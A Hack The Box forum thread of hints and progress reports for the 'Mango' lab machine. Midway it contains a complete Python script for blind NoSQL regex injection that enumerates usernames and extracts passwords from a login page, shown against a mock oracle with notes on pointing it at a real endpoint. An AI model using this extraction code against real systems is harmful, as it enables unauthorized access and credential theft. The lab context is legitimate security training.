Mango

@n00bsys0p said:

OK, I’ve got right up to the end with user 2 and am trying to run something through j*, but everything I try relating to privesc from g*b*s results in an unresponsive terminal with what looks like a shell hash at the beginning. Anyone have any pointers that will get me out of this rut? Been working on it on and off for a couple of days and getting nowhere.

Don’t expect too much… no shell needed for CTF… sometimes reading is enough…

Finally got root! That juice extraction gave me a headache. Learned some new stuff.

User: If you don’t get all of the juice, just think about whether you are looking at the right positions for new juice.

Root: Basic enumeration should do it!

Can anyone give me a little PM nudge as to how to enumerate the box to find the login page?

A shout out to @3l0nMu5k for helping me get user. Learnt something new, as usual.

As for ROOT. WTF… lol. It was so stupid and simple to get the flag. It was so silly that I still feel incomplete in my soul, lol. I did not use GO*b. Just something super simple. :slight_smile:

Happy to help with nudges. :slight_smile:

I have some trouble with the Mango machine. Now I have a…n and t…2, m… and h…U. Are they correct? But I can’t connect to SSH on 10.10.10.162:22, so what should I do? Thx!!!

Now I got root, thanks to @cloudkh.

The initial part was very interesting, I had never used this technique.

User: you already have everything.
Root: if you can’t do it from the inside, try it from the outside, or change your point of view.

Thanks @MrR3boot for the machine.

Interesting box so far…
Detected login page, can authenticate, no clue what to check next! Any hints?

Done! After some struggles and head banging. Thanks @Anonimbus for the push!

Initial Access: The name of the machine + Payloads All The Things
User: Almost same as the beginning
Root: GTFO is the place to be.

PM for push

Finally got root, woah.
Thanks to @MrR3boot for this one.

Some new techniques learned, new scripts written, basic enumeration skills renewed. Now I love mangoes even more.

Initial foothold was the hardest part for me. For all who are trying to get in: you already have all the hints in this thread. Let me repeat some that really helped me:

user:

  1. Different site faces to explore; if you cannot find your way, try to reach a different one.
  2. Mango is a key… huh, yes it’s trivial, but that’s it.
  3. Check how far you are from home on every step.
  4. CS can help you with a big step count.
  5. You will get some juicy things after all, but they’re not for home use.
  6. Do not leave when you already feel like a fruit; grow yourself up to anyone you want to be.

root:

  1. Basic enumeration, really, just try some

Finally rooted :smiley:

It was an interesting machine and thanks to everyone for the nudges.

root@mango:~# id
uid=0(root) gid=0(root) groups=0(root)

Would love someone to drop me a nudge on user. Definitely feel like I’m on the right track, but relatively new so I’ve hit a bit of a wall now and need a bit of guidance. <3

I’m stuck in the under construction page. Do I have to make my injection different, or what?

@Arkango said:

I’m stuck in the under construction page. Do I have to make my injection different, or what?

You are on the right track; maybe dumping other users would help you in some way or another?

Hi, I’m stuck trying to get the password to bypass the login page. I think I have some problem with special characters in my script. Could anyone help me?
Edit: nvm, rooted :slight_smile:

I did not struggle at all with special chars. I found a script similar to the ones in PayloadsAllTheThings that extracted both admin and pass, and found that the strings library has some very nice functions.
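
The posts above describe the same technique from three angles: a login page that can be bypassed by injection, a script that extracts both the admin username and the password from it, and trouble with special characters along the way. The following is an added example, not code from this thread or from the box. It assumes a MongoDB-style backend that forwards `field[$regex]` form keys straight into a query (one common reading of the "Mango" hint; the real backend is never shown here), and it replaces the network with a constructed in-memory oracle so it runs offline. What it shows beyond the posts is the two separate escaping layers that usually cause the special-character problems: `re.escape` so that `$`, `+`, `(` and `^` in recovered text are matched literally instead of as regex operators, and `urlencode` so that `&`, `+` and `$` survive the form POST. The alphabet comes from the standard `string` module, which is the "strings library" mentioned above.

```python
import re
import string
from urllib.parse import urlencode

# Constructed sample records for the demonstration. These are made up;
# they are not credentials from the machine.
MOCK_USERS = {
    "admin": "p4$$w0rd+&^2",
    "mango": "h3llo(w0rld)",
}

# string.printable minus whitespace that cannot survive a form post.
ALPHABET = [c for c in string.printable if c not in "\t\n\r\x0b\x0c"]


def mock_login_oracle(form):
    """Hypothetical stand-in for a login endpoint that passes form keys such
    as 'password[$regex]' into a NoSQL find(). Returns True when any record
    matches, i.e. the login 'succeeds'. Mirrors MongoDB $regex semantics by
    using an unanchored search, so the attacker must anchor with ^ and $."""
    for user, password in MOCK_USERS.items():
        if "username" in form and form["username"] != user:
            continue
        if "username[$regex]" in form and not re.search(form["username[$regex]"], user):
            continue
        if "password" in form and form["password"] != password:
            continue
        if "password[$regex]" in form and not re.search(form["password[$regex]"], password):
            continue
        return True
    return False


def encode_form(form):
    """Wire encoding of the form body. urlencode percent-encodes '&', '+',
    '$' and '^', so the regex reaches the server intact instead of being
    split into extra parameters or turned into spaces."""
    return urlencode(form)


def enumerate_usernames(oracle, alphabet=ALPHABET):
    """Depth-first prefix walk over the username field. A prefix is kept
    only if '^prefix' matches some record; '^prefix$' confirms a complete
    name. This recovers every username, not just the first one."""
    found = []

    def walk(prefix):
        if prefix and oracle({"username[$regex]": "^" + re.escape(prefix) + "$",
                              "password[$regex]": ".*"}):
            found.append(prefix)
        for ch in alphabet:
            if oracle({"username[$regex]": "^" + re.escape(prefix + ch),
                       "password[$regex]": ".*"}):
                walk(prefix + ch)

    walk("")
    return sorted(found)


def extract_password(oracle, username, alphabet=ALPHABET):
    """Recover the password for one known username one character at a time.
    re.escape keeps recovered characters such as '$' or '+' literal, so a
    recovered '$$' does not turn into an end-of-string anchor."""
    known = ""
    while True:
        for ch in alphabet:
            if oracle({"username": username,
                       "password[$regex]": "^" + re.escape(known + ch)}):
                known += ch
                break
        else:
            # Nothing extends the prefix: either the value is complete or the
            # next character lies outside the alphabet. Distinguish the two.
            if oracle({"username": username,
                       "password[$regex]": "^" + re.escape(known) + "$"}):
                return known
            raise ValueError(f"character outside alphabet after {known!r}")


if __name__ == "__main__":
    users = enumerate_usernames(mock_login_oracle)
    print("users:", users)
    for u in users:
        pw = extract_password(mock_login_oracle, u)
        print(f"{u}: {pw}")
        print("  wire body:", encode_form({"username": u, "password[$regex]": "^" + re.escape(pw) + "$"}))
```

Against a real target, `mock_login_oracle` would be replaced by a function that POSTs `encode_form(form)` and returns True on whatever the success condition is (a redirect instead of the login page, for instance); everything else stays the same. The termination check matters: without the final `^known$` probe, a password containing a character outside the alphabet is silently reported as shorter than it is.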

Great box. Thanks to @MrR3boot for creating it. Learned more from this box than the last 2 combined. If you need any nudges, feel free to PM me!

Please make sure not to attack any other servers outside the HTB scope. This includes requests made to any external CDNs hosting libraries and such.

Quite a fun box! Once you do it, it should be straight forward to do some of the new web challenges. Thank you, @MrR3boot , for making this available!

User: enumerate your life away! If you stumble into a page that seems not to be working, play around with it and you may realise it does work. Be persistent and you may get some juice!

Root: quite straight forward, it is hard to miss - but make sure you are using your second user.

and as they say in Portuguese… “chupa essa manga!” (suck on that mango!) :smiley:

Rooted! User was a pain in the butt, where you had to find the correct backend technology and use the correct juicer. Once you have the right usernameS though, the rest is pretty straightforward. Root was a matter of enumeration; LinEnum.sh always helps me the most.

All in all a very enjoyable box, thanks @MrR3boot!

Can anyone point me in the direction of finding the vulnerable backend code that makes finding users and passwords possible? I rooted the box, but want to look at the code that makes the box the way it is. I understand Apache acts as the front end, but I am not sure where web requests go after that. Is there even a backend? Or does Apache do that too?